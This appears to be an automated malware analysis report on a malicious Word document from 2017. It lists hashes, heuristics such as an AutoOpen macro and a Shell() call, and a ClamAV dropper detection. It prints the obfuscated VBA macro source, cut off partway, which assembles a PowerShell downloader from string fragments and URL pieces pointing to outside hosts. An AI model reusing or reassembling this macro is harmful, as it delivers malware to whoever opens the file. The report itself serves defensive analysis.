Office (OLE) malware analysis — malicious · a3869df4fd1002dc

MALICIOUS

Office (OLE)

256.0 KB Created: 2017-12-12 19:58:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: c431528ded07e45560d8e836abacf5c4 SHA-1: e1583ecee2b54a573a77bfa68e53a175ff8f941b SHA-256: a3869df4fd1002dc28388725282ae6838e8976f9593c853c8fa976dc5ffd9f30

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro. The macro utilizes a Shell() call, indicated by the OLE_VBA_SHELL heuristic, to execute a command. This suggests the macro's purpose is to download and run a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or phishing lure functionality.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 93783 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	93783 bytes
SHA-256: `b37e86fe233d60ca46b5caf85b055dea3db764099deedbf8490980e3c9856a43`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "GPfWUfwQlpJB" Function SjhfFYcGMspiK() UThkLAwzCh = ("GVtALiwRG" + "AzZGzrqLf" + "ubpGkiZlYuhok" + "ZYFiwYwFlVhw" + "jCbRisuYij" + "PhJLsLiMMmha") + ("MOGrppTYnFpi" + "dzvqOurTPPPkMa" + "VkmCbpFTmDjoM" + "bcTcvhiQW" + "njSwzqGcPj" + "DSnHHYj") sVBShUjab = ("pMNPzBP" + "jrQaFXAp" + "inwusrJfJzVihJ" + "DXhvzRUrsRL" + "jkwUsjXfPsJzU" + "kpEthCh") + ("WhpFpjJvGcjBd" + "KcduJiNKOkawhf" + "wjJJrNQimtqVT" + "jRTaoibQmsDb" + "TFftwiIH" + "WrliuzqBTItXi") MWDHNP = Mid("zDYFh'+'e'+'OqU+O'+'qUm(OqU+OqUITsOqU+OqUxHF+xHFhuas);breOqU+OqUaOqU+OqUk;}catOqU+OxHF+xHFqUch{OqU+xHF+xHFOqU'+'wriOqU+OqUtOqU+OqUe-host OqU+OqUITOqU+OqUs'+'_.ExcOqU+Oq'+'UeptxHFA4WG15", 6, 173) nYIAAGrE = ("miFfFnnw" + "RsEFNOPs" + "IUvwGZjKXJ" + "VnJCGkthDNI" + "uzLWbwpE" + "PkPLOpYjwu") + ("dQmdiCwdV" + "oJAHBzvCEMhE" + "FCuqsuVB" + "TsiiMhn" + "zMjpabPDMr" + "duhiYHjaoLG") nEVXYL = ("OwGYjMw" + "ptJHVYJbXzWFXv" + "WXlnLrhVWRTOAR" + "VkPIiQF" + "iXKhYUHlcTzk" + "uYkIHXn") + ("CKIKUbmpOQjRm" + "PAJJBPfr" + "BhCbLiAXsRvbNB" + "DsUvNDQTOn" + "kzwWYKKP" + "cSAaLOsq") VWZdXYVJNJ = ("AjjqHZWlNOiN" + "VSibfmfCsX" + "lKKWfGzO" + "cjJrlHiqGPOPU" + "CpCzIYaj" + "JYEzPAFG") + ("QUtmJnqYI" + "wcIuRzHjdHqpS" + "bATjJPpAIzwzTQ" + "PJkQljfAdnAI" + "czXbCwLIUJ" + "szwTJvRdq") EztShN = Mid("jDPGs4ME(xHFOqUxHF,[stRIng][ChaR]39).rePLacE(([ChaR]119+[ChaR]79+[Ch'+'aR]51),[stRIng][ChaR]0lhi", 8, 85) pjqjzFjN = ("qfCznFJujdrlOo" + "DuBZWtlRwutls" + "kzKZUXHGlLsNda" + "XVOiMXRNTUFE" + "DEtUQAzih" + "uQjwJpjJ") + ("LjaYfHfWT" + "qFOStCjSYwdb" + "qJUNjaH" + "nKptidfNNl" + "fsrHfwnucWI" + "mkjkPKtzv") iIcjLc = ("GmjizBvMLtXQiN" + "RHvCjQadfz" + "GYjOEPjFoBrE" + "AzobSXIWTr" + "GZZjijI" + "iNvXdwp") + ("jZZTZCZC" + "cwKHqNmjiIiq" + "WHspZIFaKidPZz" + "YiDzWzFiwuozIq" + "oKSlCRbjcRwLRT" + "sQQsHzFiTzRZ") iwrYBczczJ = ("NDuZYOZB" + "LLAvKwC" + "PtjfCizDJwtPD" + "lhUioMFZY" + "bRzBloVlNU" + "FPjLYwWPQfl") + ("rZTbfKp" + "qUKDlhwRUcHC" + "pjRnTPQjJIpq" + "FcSNpaYkn" + "EcarAEvnYiTC" + "BnMvYAhMVNVbT") TpFnT = Mid("owL9DI6+Oq'+'U.ru/exHF+xHFFnHpOqU+OqU/,httpOqU+OqUxHF+xHF://wOqU+OqUoOqU+OqUu'+'OqU+OqUwOQmPl", 8, 82) TiuTGW = ("vlIwjLqTwnvdzv" + "ialoOQBXjPi" + "jfwmlrhorIzcGd" + "vdUPKEiwt" + "cKduNZhAM" + "nzBKlQGi") + ("aJhlDFuOzYu" + "jFXIjDu" + "jSbuWazbKiu" + "vVSEvZaoTKhcRC" + "sdCEMME" + "IinPcHTEVdwIN") hVnBVqVkrO = ("ZMNlDrn" + "FaAcHsnwjGIwH" + "vWSiaNpVo" + "kVKSkMKVCPmPR" + "ppIHsBcpwHQqSU" + "ZzjlNsmiV") + ("XvmvrffFT" + "lFidnKvYCCttq" + "dRCiEHD" + "ntVFqtEc" + "kzbfUPGzCwNf" + "ViFhSadBB") iQwJOfvwPZG = ("TNHdFKYlwcTWF" + "IZilriKWHJzjAG" + "wUuqEKpw" + "GtSWjLwFCVvw" + "LRicwFwjZKSZzH" + "jAnTdzizMn") + ("vMriiKPDJcHc" + "jzChjzzkD" + "ZBhcTwhUVo" + "JlovfIKw" + "wYYZjfzzONqCsp" + "czhwGcHln") GVIYOfks = Mid("5UXwtRM5BwPfGabFVr. ( $Env:pUbL4zs1zC", 19, 13) JIRmE = ("qdRoIhUC" + "aRIuPZICvh" + "KpbUXrA" + "bizjjnlC" + "awQiutE" + "MjqIJYh") + ("zAACzQQhLa" + "bhZGiXGbwQTQw" + "TLHKARGRPj" + "kAFJhjWTDdTn" + "MlDwkDjkDfi" + "JWLJiJS") fCKoQzMwwCS = ("hvlTtAafTWi" + "iftiVHAj" + "YswDwMaRlHna" + "USrEvhn" + "XBaaskW" + "aJhUtJCpPwozNh") + ("vjYKaqQMS" + "fAqWcDcESLwFF" + "LQBowtno" + "nirTawHJzPbOI" + "TnsMvvWQ" + "dMzKpcNZFrLDs") ZAPDp = ("TtXARPhzwstzY" + "wOOJhMDBhUb" + "YMKKUTB" + "JTOCiVVioKlihf" + "wuZcFlSLCZ" + "rVmlYZzaU") + ("ALiMqUMXjwW" + "oNQvrvMrHMdRi" + "wDmMjHL" + "wiuPORFoTcqwj" + "UchBNdXoiN" + "qYJkWPPjvRhB") mjzMRtKtSD = Mid("mmqQA50J701DANDGlis/b2oxHF+xHFOqU+OqUjS/,hOqU+OqUttp:/'+'/dOqxHF+'+'xHFU+OqUericisOqU+OxHF+xHFqUhoexHF+xHFs.OqU+OqUcom/xAOqU+OqU5ey/,httOqU+OqUp://OqU+OqUepc.freelanceOqU+9pVwbp3zZXHTB0Ajqm", 18, 154) OHibEGIhz = ("kBHLBBqizCEi" + "FhstSWn" + "GblSjjpWX" + "IbCIKnkUOAwPwG" + "bHrMzsjE" + "daWsVRAIaF") + ("HwzXFJwHnPrffL" + "bwJZFbW" + "fjRrzzzqoqKz" + "KUHouZRGlvq" + "PqCwAAUkRSno" + "wKnZDoVMb") LBkWzifM = ("iwMmAqDN ... (truncated)

SHA-256: b37e86fe233d60ca46b5caf85b055dea3db764099deedbf8490980e3c9856a43

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GPfWUfwQlpJB"
Function SjhfFYcGMspiK()
UThkLAwzCh = ("GVtALiwRG" + "AzZGzrqLf" + "ubpGkiZlYuhok" + "ZYFiwYwFlVhw" + "jCbRisuYij" + "PhJLsLiMMmha") + ("MOGrppTYnFpi" + "dzvqOurTPPPkMa" + "VkmCbpFTmDjoM" + "bcTcvhiQW" + "njSwzqGcPj" + "DSnHHYj")
sVBShUjab = ("pMNPzBP" + "jrQaFXAp" + "inwusrJfJzVihJ" + "DXhvzRUrsRL" + "jkwUsjXfPsJzU" + "kpEthCh") + ("WhpFpjJvGcjBd" + "KcduJiNKOkawhf" + "wjJJrNQimtqVT" + "jRTaoibQmsDb" + "TFftwiIH" + "WrliuzqBTItXi")
MWDHNP = Mid("zDYFh'+'e'+'OqU+O'+'qUm(OqU+OqUITsOqU+OqUxHF+xHFhuas);breOqU+OqUaOqU+OqUk;}catOqU+OxHF+xHFqUch{OqU+xHF+xHFOqU'+'wriOqU+OqUtOqU+OqUe-host OqU+OqUITOqU+OqUs'+'_.ExcOqU+Oq'+'UeptxHFA4WG15", 6, 173)
nYIAAGrE = ("miFfFnnw" + "RsEFNOPs" + "IUvwGZjKXJ" + "VnJCGkthDNI" + "uzLWbwpE" + "PkPLOpYjwu") + ("dQmdiCwdV" + "oJAHBzvCEMhE" + "FCuqsuVB" + "TsiiMhn" + "zMjpabPDMr" + "duhiYHjaoLG")
nEVXYL = ("OwGYjMw" + "ptJHVYJbXzWFXv" + "WXlnLrhVWRTOAR" + "VkPIiQF" + "iXKhYUHlcTzk" + "uYkIHXn") + ("CKIKUbmpOQjRm" + "PAJJBPfr" + "BhCbLiAXsRvbNB" + "DsUvNDQTOn" + "kzwWYKKP" + "cSAaLOsq")
VWZdXYVJNJ = ("AjjqHZWlNOiN" + "VSibfmfCsX" + "lKKWfGzO" + "cjJrlHiqGPOPU" + "CpCzIYaj" + "JYEzPAFG") + ("QUtmJnqYI" + "wcIuRzHjdHqpS" + "bATjJPpAIzwzTQ" + "PJkQljfAdnAI" + "czXbCwLIUJ" + "szwTJvRdq")
EztShN = Mid("jDPGs4ME(xHFOqUxHF,[stRIng][ChaR]39).rePLacE(([ChaR]119+[ChaR]79+[Ch'+'aR]51),[stRIng][ChaR]0lhi", 8, 85)
pjqjzFjN = ("qfCznFJujdrlOo" + "DuBZWtlRwutls" + "kzKZUXHGlLsNda" + "XVOiMXRNTUFE" + "DEtUQAzih" + "uQjwJpjJ") + ("LjaYfHfWT" + "qFOStCjSYwdb" + "qJUNjaH" + "nKptidfNNl" + "fsrHfwnucWI" + "mkjkPKtzv")
iIcjLc = ("GmjizBvMLtXQiN" + "RHvCjQadfz" + "GYjOEPjFoBrE" + "AzobSXIWTr" + "GZZjijI" + "iNvXdwp") + ("jZZTZCZC" + "cwKHqNmjiIiq" + "WHspZIFaKidPZz" + "YiDzWzFiwuozIq" + "oKSlCRbjcRwLRT" + "sQQsHzFiTzRZ")
iwrYBczczJ = ("NDuZYOZB" + "LLAvKwC" + "PtjfCizDJwtPD" + "lhUioMFZY" + "bRzBloVlNU" + "FPjLYwWPQfl") + ("rZTbfKp" + "qUKDlhwRUcHC" + "pjRnTPQjJIpq" + "FcSNpaYkn" + "EcarAEvnYiTC" + "BnMvYAhMVNVbT")
TpFnT = Mid("owL9DI6+Oq'+'U.ru/exHF+xHFFnHpOqU+OqU/,httpOqU+OqUxHF+xHF://wOqU+OqUoOqU+OqUu'+'OqU+OqUwOQmPl", 8, 82)
TiuTGW = ("vlIwjLqTwnvdzv" + "ialoOQBXjPi" + "jfwmlrhorIzcGd" + "vdUPKEiwt" + "cKduNZhAM" + "nzBKlQGi") + ("aJhlDFuOzYu" + "jFXIjDu" + "jSbuWazbKiu" + "vVSEvZaoTKhcRC" + "sdCEMME" + "IinPcHTEVdwIN")
hVnBVqVkrO = ("ZMNlDrn" + "FaAcHsnwjGIwH" + "vWSiaNpVo" + "kVKSkMKVCPmPR" + "ppIHsBcpwHQqSU" + "ZzjlNsmiV") + ("XvmvrffFT" + "lFidnKvYCCttq" + "dRCiEHD" + "ntVFqtEc" + "kzbfUPGzCwNf" + "ViFhSadBB")
iQwJOfvwPZG = ("TNHdFKYlwcTWF" + "IZilriKWHJzjAG" + "wUuqEKpw" + "GtSWjLwFCVvw" + "LRicwFwjZKSZzH" + "jAnTdzizMn") + ("vMriiKPDJcHc" + "jzChjzzkD" + "ZBhcTwhUVo" + "JlovfIKw" + "wYYZjfzzONqCsp" + "czhwGcHln")
GVIYOfks = Mid("5UXwtRM5BwPfGabFVr. ( $Env:pUbL4zs1zC", 19, 13)
JIRmE = ("qdRoIhUC" + "aRIuPZICvh" + "KpbUXrA" + "bizjjnlC" + "awQiutE" + "MjqIJYh") + ("zAACzQQhLa" + "bhZGiXGbwQTQw" + "TLHKARGRPj" + "kAFJhjWTDdTn" + "MlDwkDjkDfi" + "JWLJiJS")
fCKoQzMwwCS = ("hvlTtAafTWi" + "iftiVHAj" + "YswDwMaRlHna" + "USrEvhn" + "XBaaskW" + "aJhUtJCpPwozNh") + ("vjYKaqQMS" + "fAqWcDcESLwFF" + "LQBowtno" + "nirTawHJzPbOI" + "TnsMvvWQ" + "dMzKpcNZFrLDs")
ZAPDp = ("TtXARPhzwstzY" + "wOOJhMDBhUb" + "YMKKUTB" + "JTOCiVVioKlihf" + "wuZcFlSLCZ" + "rVmlYZzaU") + ("ALiMqUMXjwW" + "oNQvrvMrHMdRi" + "wDmMjHL" + "wiuPORFoTcqwj" + "UchBNdXoiN" + "qYJkWPPjvRhB")
mjzMRtKtSD = Mid("mmqQA50J701DANDGlis/b2oxHF+xHFOqU+OqUjS/,hOqU+OqUttp:/'+'/dOqxHF+'+'xHFU+OqUericisOqU+OxHF+xHFqUhoexHF+xHFs.OqU+OqUcom/xAOqU+OqU5ey/,httOqU+OqUp://OqU+OqUepc.freelanceOqU+9pVwbp3zZXHTB0Ajqm", 18, 154)
OHibEGIhz = ("kBHLBBqizCEi" + "FhstSWn" + "GblSjjpWX" + "IbCIKnkUOAwPwG" + "bHrMzsjE" + "daWsVRAIaF") + ("HwzXFJwHnPrffL" + "bwJZFbW" + "fjRrzzzqoqKz" + "KUHouZRGlvq" + "PqCwAAUkRSno" + "wKnZDoVMb")
LBkWzifM = ("iwMmAqDN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.